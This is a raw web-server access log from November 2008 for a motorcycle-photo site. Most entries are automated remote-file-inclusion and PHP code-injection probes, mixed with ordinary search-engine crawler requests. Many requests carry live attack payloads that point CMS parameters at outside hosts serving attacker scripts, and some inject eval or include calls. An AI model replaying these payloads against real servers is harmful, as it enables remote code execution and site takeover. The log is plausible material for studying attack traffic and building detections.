201.130.248.13 - - [04/Nov/2008:11:40:26 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.40 - - [04/Nov/2008:11:40:50 -0800] "GET /megumi/earrings/?N=D HTTP/1.1" 200 2081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.53.141.2 - - [04/Nov/2008:11:40:50 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.141.2 - - [04/Nov/2008:11:40:53 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:40:58 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:40:58 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:41:00 -0800] "GET /logs/access_080830.log/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:11:41:16 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:11:41:17 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:41:28 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:41:28 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:41:37 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:41:37 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:11:41:52 -0800] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:11:41:52 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:11:41:53 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:11:41:57 -0800] "GET /logs/access_080531.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:11:41:57 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:11:42:04 -0800] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:11:42:25 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:11:42:26 -0800] "GET /logs/access_080121.log//modules/My_eGallery/public/displayCategory.php?basepath=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [04/Nov/2008:11:43:00 -0800] "GET /blog/index.php/page/2/?show=slide&pageid=159&nggpage=20 HTTP/1.1" 200 13416 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
82.135.199.29 - - [04/Nov/2008:11:43:14 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.135.199.29 - - [04/Nov/2008:11:43:14 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:43:33 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:43:33 -0800] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:43:33 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:43:33 -0800] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:13 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:15 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:16 -0800] "GET /blog/index.php/page/2/?show=slide&pageid=159&nggpage=20 HTTP/1.0" 200 13400 "http://search.live.com/results.aspx?q=motorcycles" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:17 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:17 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:17 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:17 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:18 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.69 - - [04/Nov/2008:11:44:18 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/page/2/?show=slide&pageid=159&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:28 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:28 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:46 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:46 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:46 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:44:47 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:11:45:01 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:45:30 -0800] "GET /logs/access_080613.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:45:34 -0800] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:45:34 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
65.55.211.29 - - [04/Nov/2008:11:46:10 -0800] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:46:11 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:46:11 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:46:11 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:47:31 -0800] "GET /logs/access_080624.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:47:48 -0800] "GET /logs/access_080925.log%20/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:11:48:27 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:11:48:33 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:48:36 -0800] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:48:37 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:48:37 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
65.55.211.40 - - [04/Nov/2008:11:48:39 -0800] "GET /blog/index.php/category/motorcycles/?show=slide&nggpage=3 HTTP/1.1" 200 97201 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:48:44 -0800] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:48:50 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:48:50 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:48:50 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:48:50 -0800] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.40 - - [04/Nov/2008:11:49:12 -0800] "GET /blog/index.php/page/2/?show=slide&pageid=17&nggpage=6 HTTP/1.1" 200 13414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
210.116.103.35 - - [04/Nov/2008:11:49:23 -0800] "GET /logs/access_080307.log//site/index.php?option=http://kukesii.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:11:49:23 -0800] "GET /site/index.php?option=http://kukesii.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:11:49:24 -0800] "GET /logs//site/index.php?option=http://kukesii.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:11:49:46 -0800] "GET /logs/access_081010.log////?DOCUMENT_ROOT=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:11:49:47 -0800] "GET /logs////?DOCUMENT_ROOT=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 200 72143 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:11:49:47 -0800] "GET ///?DOCUMENT_ROOT=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 200 94695 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/Nov/2008:11:49:49 -0800] "GET /logs/access_080723.log////?DOCUMENT_ROOT=http://variant-1.ru/netcat_files/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:50:21 -0800] "GET /bikes/dteel/2008_01_26/ZbThumbnail.info HTTP/1.0" 200 112300 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:50:46 -0800] "GET /PRIV8http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:11:50:46 -0800] "GET /logs/PRIV8http://oursoultvxq.com/bbs/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:50:56 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:51:05 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
65.55.231.90 - - [04/Nov/2008:11:51:15 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
66.28.139.42 - - [04/Nov/2008:11:51:17 -0800] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:11:51:17 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.159.97.139 - - [04/Nov/2008:11:51:20 -0800] "GET /logs/access_080109.log HTTP/1.1" 200 621135 "-" "-" "www.dmulk.com"
78.159.97.138 - - [04/Nov/2008:11:51:21 -0800] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "-" "www.dmulk.com"
78.159.97.139 - - [04/Nov/2008:11:51:22 -0800] "GET /logs/access_080117.log HTTP/1.1" 200 670488 "-" "-" "www.dmulk.com"
78.159.97.138 - - [04/Nov/2008:11:51:22 -0800] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "-" "www.dmulk.com"
78.159.97.139 - - [04/Nov/2008:11:51:22 -0800] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "-" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:11:51:24 -0800] "GET /logs/access_080302.log//site/index.php?option=http://kukesii.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /logs/access_080303.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /logs/access_080303.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:32 -0800] "GET /logs/access_080525.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:51:32 -0800] "GET /logs/access_080525.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:51:56 -0800] "GET /logs/access_080122.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:52:05 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:52:05 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:52:05 -0800] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:52:08 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:52:16 -0800] "GET /logs/access_080202.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
